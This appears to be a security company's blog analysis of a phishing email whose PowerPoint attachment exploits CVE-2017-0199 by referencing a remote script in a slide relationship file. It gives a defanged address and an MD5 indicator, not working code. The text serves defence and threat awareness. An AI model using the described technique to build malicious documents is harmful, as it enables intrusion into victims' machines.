top of page
  • Writer's pictureISSP

Intruders used CVE-2017-0199 vulnerability

Updated: Oct 18, 2022

The e-mail OriginalMessage.txt.msg contains an attachment with the malicious file Prezent_UA_2k_berezen_PRESS.ppsx, which is a 16-slide presentation on the socio-political situation in Ukraine.

Example of a slide from the file Prezent_UA_2k_berezen_PRESS.ppsx
Example of a slide from the file Prezent_UA_2k_berezen_PRESS.ppsx

How does this malicious work?

The malicious file is interesting because it does not contain any embedded malicious macros. Instead, the intruders have used the CVE-2017-0199 vulnerability, which allows generating a malicious PPSX-file and delivering payload to the victim without any complex configuration. The file slide1.xml.rels is used when exploiting. Files with a .rels extension are relationship files. These files contain information on how parts of various Microsoft Office documents fit together. This information is also called “relationship parts”. In case with this malicious presentation the hxxp:// address was written into the slide1.xml.rels file:

Content of the slide1.xml.rels file
Content of the slide1.xml.rels file

If you click on hxxp://, you will see a script that creates a malicious file in the %temp% directory and runs it. As at the time of analysis, this address is no longer available.

Indicators of Compromise



IP addresses:



MD5: CAFB6B5795C26376289832CFFC3AEE94


Recent Posts

See All


bottom of page